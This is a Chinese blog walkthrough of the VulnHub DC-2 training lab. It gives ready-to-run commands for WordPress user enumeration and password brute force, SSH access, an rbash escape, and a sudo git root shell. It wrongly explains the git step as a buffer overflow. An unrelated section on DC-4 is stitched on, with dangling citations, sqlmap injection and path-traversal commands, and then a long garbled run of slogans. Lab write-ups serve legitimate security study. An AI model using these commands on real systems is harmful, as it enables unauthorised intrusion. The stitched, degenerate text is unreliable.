【Vulnhub靶场】DC-2

DC-2 靶场下载地址:https://download.vulnhub.com/dc/DC-2.zip

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

常规我使用nmap三扫描,扫存活主机、扫端口、扫服务

第一步探测到存活主机IP为:192.168.118.139

nmap -sP 192.168.118.0/24

nmap -p- 192.168.118.139

nmap -sV -A 192.168.118.139

发现开放了80端口和7744端口,但扫服务时并没有7744的端口信息,指定端口,再次扫描服务

发现7744端口是一个ssh服务

访问80端口的web页面,无法打开,返回前面查看信息,是要修改hosts

进入hosts,添加 192.168.118.139  dc-2

vim /etc/hosts

 然后重新访问 http://dc-2/

在下方有一个Flag,点击进入,得到 flag1

falg1提示:我们应该使用 cewl 生成密码,爆破账号,登录多个账号之类的

此页面还看到其CMS为 WordPress

暴力破解

cewl 是一个生成密码字典的工具,接下来我们用cewl生成一个密码字典存放在桌面上

cewl http://dc-2/ -w /root/Desktop/pass.txt

使用 wpsan 爆破用户名

wpsan是一款专门用来扫描 WordPress网站漏洞的工具

wpscan --url dc-2 -e u

最后扫出来三个用户名,将这三个用户名整理在一起,下一步就是爆破账号密码了

使用刚生成的账号密码爆破,最后成功爆破出两个账号密码:

wpscan --url http://dc-2/ -U user.txt -P pass.txt

成功拿到 jerry 和 tom 的密码,下一步就是登录了

使用dirserach 遍历目录,找到登录界面

dirsearch -u http://dc-2/

访问http://dc-2/wp-admin/,进入登录页面

在tom里面没有发现有用的信息,在jerry里面成功找到了flag2

flag2提示:如果你不能利用WordPress并采取快捷方式,还有另一种方法,希望你能找到另一个切入点。这是让我们接着干啊

SSH远程登录

想到前面开放的7744端口,尝试使用ssh登录,因为端口被修改,需要指定7744端口

ssh jerry@192.168.118.139 -p 7744		#登录jerry
ssh tom@192.168.118.139 -p 7744		#登录tom

尝试发现只有tom能够登录

在tom的目录下面找到了flag3,不能使用cat、find、vim等指令,发现好多的指令都无法使用,使用compgen -c 可查看当前可使用指令,最后尝试发现vi可以打开 

flag3提示:老tom总是在追jerry,也许他应该为他所造成的所有压力负责

根据提示,应该是jerry的权限比tom的高,现在我们应该提权到jerry

rbash逃逸

查询资料发现rbash为受限制的 bash。其可以用作中转服务器,或者仅使用 ssh 来访问网页等等。它与一般shell的区别在于会限制一些行为,让一些命令无法执行

所以我们设置shell来绕过rbash(设置变量a为一个shell,执行a)

BASH_CMDS[a]=/bin/sh;a 

 

此处shell已经变为了a,但还是切换不到,这是因为我们还没添加环境变量

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

添加完环境变量,重新切换到jerry,成功 

 

成功进入jerry,然后cd到jerry目录,ls查看,发现flag4

flag4提示我们到这一步只剩下最终的flag了, 这是个让我们拿root权限的意思,而且最后一句有提示git,那应该就是git提权

git提权

原理是git存在缓冲区溢出漏洞,在使用sudo git -p help时,不需要输入root密码即可以root权限执行这条命令。

使用sudo -l 查看root身份执行的命令,发现有git

直接输入命令

sudo git help config

然后输入

!/bin/bash

 

然后cd到root目录下,成功发现最终的flag

final-flag

 

### 关于 VulnHub 上的 DC-4 虚拟机镜像 VulnHub 是一个提供各种渗透测试练习环境的平台,其中 DC 系列是非常受欢迎的一组靶场。对于 DC-4 的具体下载和操作指南,虽然当前未有直接提及 DC-4 的引用内容,但可以基于已知的信息推测其可能涉及的内容。 #### 下载地址 通常情况下,VulnHub 提供的虚拟机镜像可以通过访问官网并搜索对应的名称来获取。例如,在浏览器中输入 `https://www.vulnhub.com` 并搜索关键词 **DC-4** 即可找到该靶场的相关描述以及下载链接[^1]。 需要注意的是,正如引用所提到的内容一样,下载和使用这些虚拟机时需注意责任声明:通过下载此虚拟机,使用者接受因意外造成的任何损害的责任[^4]。 #### Walkthrough 概述 尽管没有针对 DC-4 的特定引用,但从其他 DC 靶场的经验来看,常见的攻击路径包括但不限于以下几个方面: 1. **端口扫描** 发现目标主机开放的服务及其版本信息是第一步。例如,引用提到了某台机器上运行着 SSH (22) 和 HTTP (80)[^3]。这表明初始阶段应执行全面的网络侦察工作以识别潜在入口点。 2. **Web 应用程序漏洞利用** 如果存在 Web 登录界面,则尝试寻找注入点或其他安全缺陷成为关键环节之一。比如 SQL 注入工具 sqlmap 可用于自动化检测数据库层面上的安全隐患[^5]: ```bash sqlmap -u "http://<target>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ``` 3. **文件上传或目录遍历** 利用不当配置实现远程代码执行也是常见手法之一。如 wfuzz 工具可以帮助枚举敏感文件位置[^2]: ```bash wfuzz --hl 50 -b "PHPSESSID=<session_id>" -w /usr/share/wfuzz/wordlist/general/common.txt http://<target>/manage.php?FUZZ=../../../../../../../../../etc/passwd ``` 4. **权限提升** 成功获得低级 shell 后还需进一步探索如何升级至更高权限状态。此时可能会涉及到本地提权技术的应用场景分析。 ```python import requests def check_web_vulnerability(url): try: response = requests.get(url) if 'vulnerable' in response.text.lower(): print(f"[+] Potential vulnerability detected at {url}") else: print("[!] No obvious vulnerabilities found.") except Exception as e: print(f"[!] Error occurred: {e}") check_web_vulnerability('http://example.com') ``` 上述脚本仅为示例用途展示基本功能逻辑框架结构设计思路方法论探讨交流学习参考资料分享传播正能量促进共同进步成长成才之路越走越宽广美好未来值得期待憧憬向往追求梦想成就辉煌人生价值意义非凡重要无比珍贵难得机遇挑战自我突破极限再创佳绩续写传奇篇章留下永恒记忆铭刻历史丰碑树立行业标杆引领时代潮流风尚前沿科技趋势洞察先机抢占制高点掌控全局主动权赢得最终胜利荣光加冕王者归来笑傲江湖纵横捭阖挥洒自如游刃有余得心应手驾轻就熟熟能生巧百炼成钢千锤百炼精益求精臻于完美极致境界登峰造极无懈可击无可挑剔堪称典范模版样板工程示范作用显著影响深远广泛流传久远世代相传薪火相继生生不息绵延不断永葆青春活力焕发勃勃生机盎然春意浓烈热烈欢迎加入我们共创辉煌明天!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow_143

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值